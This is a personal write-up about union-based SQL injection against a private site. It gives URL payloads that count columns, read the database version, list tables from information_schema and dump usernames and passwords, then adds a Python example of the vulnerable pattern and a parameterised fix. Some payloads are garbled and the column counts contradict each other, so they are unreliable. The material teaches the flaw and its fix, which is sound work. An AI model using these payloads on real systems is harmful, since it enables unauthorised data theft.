SQL Injection (Union-Based) Leads to Dumping (Fetching) Sensitive Information

SüNIL
Jan 1, 2021

Hello all, this is my first write-up on Medium. I am going to share how I hacked a web application through an SQL injection vulnerability. I was testing a private website; assume that the website was https://example.com.
On that website, I checked for an SQLi vulnerability. I was interested in testing parameter functionality, something like id=1.

I found the injection point and put an apostrophe (') at it.
Example: https://example.com/products.php?id=5 ( <= ) or ( ' ). This type of website is needed in order to do this trick.

Unfortunately, this site does not properly validate the input string, so it shows an error message.

This error is the lead that points to an SQL injection vulnerability.

NOTE: Many tools exist for finding SQL injection, for example SQLmap. But I tested manually, because that is what interests me. I used one browser extension and that's it.

ORDER BY -> this command is used to find how many columns the site's query has.

https://example.com/products.php?id=5 Order By 8 — +

This returns an error message, so reduce the number: 7, 6, 5, 4.

When I put the number 6, the site loaded normally with no error message, so the site has only 6 columns.

That determines the number of columns required in an SQL injection UNION attack. UNION SELECT -> this command is used to find and show which columns are vulnerable.

So I know that there are four columns; now I have to find out which ones are vulnerable to injection. To do this I will use the UNION and SELECT queries while keeping the double dash (--), which starts an SQL comment, at the end of the string.

https://example.com/products.php?id=5'+Union+Select+1,2,3,4,5,6 — +

After entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database. 2, 4: these three columns are vulnerable.

I can inject the SQL query in the 2nd column. The next step is to find the name of the database and which version of SQL the website is using.

https://example.com/products.php?id=5'+Union+Select+1, concat(@@version, Database(), User()),3,4,5,6 — +

Then I can extract the table names using this SQL injection query.

https://example.com/products.php?id=-1'+union select 1(select+group_concat(table_name+separator+0x3c62723e)+from+information_schema. tables+where+tables_schema=database ()),3,4,5,6,7 — +

Extract all the table names. This is the injection query:

https://example.com/products.php?id=-1'+union select+1(select+group_concat(column_name+separator+0x3c62723e)+From+information_schema.column+where+tables_name=authorised_user()(Change the String because firewall blocks)),3,4,5,6,7 — +

Then dump the data from the authorized user table:

https://example.com/products.php?id=-1'+union+select+1(select+group_concat (username, password+separator+0x3c62723e) +From+authorised_users ()),3,4,5,6,7 — +

Finally, we dumped the maximum information about this site. I have reported it to that website.
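Why the requests above work, and the server-side fix, shown as an added example that is not the author's or the site's code. It assumes the backend pasted the id parameter into the query text; an in-memory SQLite database stands in for the site's database, and the table contents, function names and payload string are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the site's database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        CREATE TABLE authorised_users (username TEXT, password TEXT);
        INSERT INTO products VALUES (5, 'Widget', '9.99');
        INSERT INTO authorised_users VALUES ('admin', 'constructed-hash');
    """)
    return db

def get_product_vulnerable(db, raw_id):
    # Assumed server-side pattern: the id parameter is pasted into the SQL
    # text, so a quote ends the literal and the rest is parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def get_product_safe(db, raw_id):
    # Check 1: the parameter must have the type the page expects.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    # Check 2: bind the value so the driver never parses it as SQL.
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Constructed input in the style of the requests above (3 columns here).
PAYLOAD = "-1' UNION SELECT 1, username, password FROM authorised_users -- "

if __name__ == "__main__":
    db = make_db()
    print(get_product_vulnerable(db, "5"))      # the product row
    print(get_product_vulnerable(db, PAYLOAD))  # a row from authorised_users
    print(get_product_safe(db, "5"))            # the product row
    try:
        get_product_safe(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

With the bound, type-checked parameter the same request is rejected before any SQL runs, and the error is raised by the application rather than leaked from the database.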

Thanks for reading..!
